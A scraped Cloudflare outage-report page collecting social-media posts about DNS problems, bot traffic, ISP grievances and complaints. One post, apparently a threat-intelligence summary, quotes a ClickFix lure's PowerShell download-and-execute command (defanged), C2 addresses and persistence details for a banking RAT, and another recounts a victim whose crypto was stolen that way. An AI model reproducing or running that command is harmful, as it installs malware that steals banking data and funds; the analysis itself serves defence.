Cloudflare Outage Map

Community Discussion

Tips? Frustrations? Share them here. Useful comments include a description of the problem, city and postal code.

Beware of "support numbers" or "recovery" accounts that might be posted below. Make sure to report and downvote those comments. Avoid posting your personal information.

Cloudflare Issues Reports

Latest outage, problems and issue reports in social media:

• 
  Richard Sever (@cshperspectives) reported 9 minutes ago

  @manuelrivascruz working on solutions to this. the problem as I'm sure you can imagine is like so many sites we are being hammered by LLM bots in addition to all the DDOS attacks, so (again like many others) use services like Cloudflare to ensure human readers maintain access

• 
  Shantanu Dhanuka (@trudydehacker) reported 10 minutes ago

  @CloudflareHelp Hi, My domain DNS on cloudflare and hosted on CF Pages is returning Warning - Suspected Phishing - This website has been reported for potential phishing. This is happening only with the homepage, inner pages are working fine. We raised multiple ticket Pls help

• 
  CAPED CRUSADER🦇 (@stilleclectic) reported 11 minutes ago

  @matthansbello Sigh, everything was originally done on namecheap but I’ve now just moved the dns to cloudflare. Waiting to see if that fixes the issue

• 
  Armeet (@armeetjatyani) reported 12 minutes ago

  @tomhaerter Primarily Cloudflare now. GCP support is extremely sluggish

• 
  BlockedPath (@BlockedPaths) reported 12 minutes ago

  @Howaboua You have to install their multiple mcp servers for that, check out the docs. I’ve been ******* with it for a few days and ported it into just about every harness. The timeout out errors and it randomly spitting out Chinese is funny. I did jailbreak that **** though via cloudflare

• 
  pathik (@pathikghugare) reported 15 minutes ago

  @NotRoodraksh @4k_isn not working on cloudflare warp

• 
  Data (@DataDeLaurier) reported 17 minutes ago

  @distributedkv "...and dont require me to use cloudflare or a vpn if i want to self-host also take down the cloud."

• 
  Qubicle | Based Dept. Treasury 🏦 (@cubeqube) reported 20 minutes ago

  @nejatian @Opendoor love the job posting super enticing, opendoor is legit the only company I've even thought about trying to actually get a job at in years wanted my current job to be my last but running it back one more time at a place im all in on and on an idea i want to see succeed before going off and doing my own thing sounds like fun. if my parents lived closer to Miami I'd be outside the office rn begging ya'll to hire me so I can help 100x OPEN but my parents are getting old now, etc. so I'm torn. I wish that job posting wasn't written for everything I like to do and how I work already it's just too good. I get bored with things that are easy to solve or do it's my biggest problem so I enjoy bouncing around to diff teams and doing random things and try to learn enough about everything so that I can do everyones job if needed & I've had some pretty intense cybersecurity fellas and cloud experts (from google, mandiant, etc) say I know what I'm doing when it comes to cloud after reviewing my **** infra setups and SDLC flows I designed and implemented so that's a big part of my T I guess, but it's boring me now because it's kind of easy at this point haven't had a tough challenge to solve in a bit; not that im the best ever or in an arrogant way but it's just all kind of the same thing at the end of the day and 99% of infra & software problems have been solved already they just need to be found first so it's more fun now for me to think about the entire pie than a piece of it thats why I like that job posting. fun fact: I used a cloudflare product in a unique way for my work's enterprise **** setup ~7 years ago that the cf team (atleast those in the call!) had never seen someone use it that way before, found it interesting and added it to their documentation a couple weeks later (a use case for argo tunnel) and it's now one of the most common uses of it. nothing fancy I thought it was cool though.

• 
  Nicholas Preston (@Mike_Preston17) reported 22 minutes ago

  @PLOwingPots @DevLeaderCa You really should learn C and C++ to understand the fundamentals, etc. I say this as a C# dev who went C -> C++ -> Java -> C#. You won't appreciate the 'better' language nearly as much if you don't at least suffer from the shortcomings of its successor language. I suffered pointer and stack overflows from C++ and that taught me to not be an idiot with my memory. Rust babies devs too much, imo - that's what (again, imo) led to the Cloudflare outage: too much trust in the compiler and willfully ignoring the dynamic nature of data in production (which NO language can account for).

• 
  Coffee and Gun Oil (@coffee_oil) reported 27 minutes ago

  @ShamashAran I was on cloudflare ******* with DNS last night. I hate DNS The **** I run locally works fine, but that's because it's me and a text file.

• 
  DFIR Radar (@DFIR_Radar) reported 29 minutes ago

  AI-generated ClickFix lure impersonates a Brazilian 🇧🇷 bank to drop SmartRAT, a PowerShell banking RAT with QR-swap, keylogging, and fake overlay capabilities. The C2 panel had no server-side auth. Key findings: - Full infection chain: typosquatting domain cartaobb[.]com mimics cartaobrb[.]com[.]br, fake Cloudflare CAPTCHA triggers clipboard injection, fake BSOD locks the browser, then victim pastes: powershell "$k8='hxxp://64[.]95[.]13[.]238/st.txt';iex(irm $k8)" into Run. Three-stage PowerShell dropper pulls payload[.]php, AES-CBC decrypts SmartRAT in memory. Hashes: st.txt 297eb45f028d44d750297d2f932b9c91, RAT b17ccdb5531555e43f082d6e77c07227. - SmartRAT (SMART_V25) persists as scheduled task or Windows service named MicrosoftEdgeUpdateCore (T1543.003), copies itself to %APPDATA%\Microsoft\Diagnosis\ETW\msedgeupdate.txt, logs all activity to C:\ProgramData\Microsoft\Diagnosis\ETW\client_debug.log and per-PID logs. - C2 at c[.]windowsupdate-cdn[.]com port 51888 (fallback 162[.]141[.]111[.]227), AES-CBC encrypted over raw TCP. QR-swap feature overlays attacker QR at exact pixel coordinates of the legitimate banking QR to redirect transactions. Monitors window titles for santander, bradesco, itau, nubank, binance, and a dozen more. - The C2 panel (branded MyGood PRO) bypasses auth by checking only localStorage values authToken and currentUser client-side with no server validation, exposing the full admin panel to anyone who sets those keys. #DFIR_Radar

• 
  doeyor.sol (@Doeyor) reported 29 minutes ago

  @trunoest Last night I bought into algopub at 140k and the website linked had a cloudflare login I clicked and it asked me to enter something in my windows run which was to allow the attacker to install a remote Trojan they could use later. I realized at the time like something was wrong here but didn’t immediately know what was up and was constantly checking my balance to essentially see everything disappear 5-10 minutes go by and nothing start thinking I’m in the clear go on with my night end up going to bed left my computer on but not locked wake up to find 0 SOL balance and a bunch of tabs open on my pc. Thankfully didn’t have any eth on based bot and he opened up axiom and exported my private keys and sent just the 5 sol (3 wallets) I have to this (BBNpySDumyS3k4mULaunbMfyZz1Bpbt2B5PwVVWZVy3F) looks like he got a few other people as well. can even see my sns doeyor.sol Could have truly ruined my life with the access he had to my full computer. Just a reminder to be ever vigilant; went ahead and wiped the 3 hard drives that were connected to my computer with kill disk and reinstalled a fresh windows this morning.

• 
  Tushar Dwivedi (@tush_2708) reported 33 minutes ago

  @SayantikaSays Try @BSNLCorporate . And I am not joking. It is best if it's available in your area. No BS service. I never heard these lines from BSNL, which I kept hearing from other providers like Jio and Airtel. "We won't give you the router password" "You can't use your own router, even if ours is ******. What do you mean you have a better router and modem? Hou must pay us a subscription for this mesh thing instead" "No, you can't use Google or CloudFlare's DNS, you must use ours. What if it's slow? If you change, how will we snoop on you and inject our advertisements into your browser?" "No, you can't open a port for you. For that, you must buy a static IP from us. Why is a static IP needed to open a port? Who knows. But we won't allow it unless you pay us extra" In the last 3 years, I have only had 2 outages on BSNL, 30-40 minutes max. While on Airtel, I had caught their staff removing my cable from their box and adding a new one for a new connection, and then making me wait till they finally got a new box after a week. They just didn't want to make a new customer wait, so they simply assigned my slot to them. And their customer care and local staff wasn't even ready to accept it, unless I showed the CCTV footage and a video of my cable literally being thrown on the side of their box, not even connected, while they were claiming that there's some backend issue.

• 
  63green (@63green) reported 36 minutes ago

  So @Cloudflare works overtime to destroy thei reputation by sending emails despite every notification turned off, and I’m willing to grant their request to never, ever trust this criminal company, and never use them. Any company willing to **** you by email will **** your data.

• 
  Rohit Kashyap | AI + Full-Stack (@rohit_jsfreaky) reported 40 minutes ago

  @EddCoates that nginx 500 is the scrapers basically ddosing you for free training data. robots txt is a polite suggestion they ignore now. what actually helps, put cloudflare in front with bot fight mode on, rate limit per asn not per ip since they rotate addresses, and consider a tarpit for the worst offenders. it is not legal so much as unenforceable at their scale, which is the real problem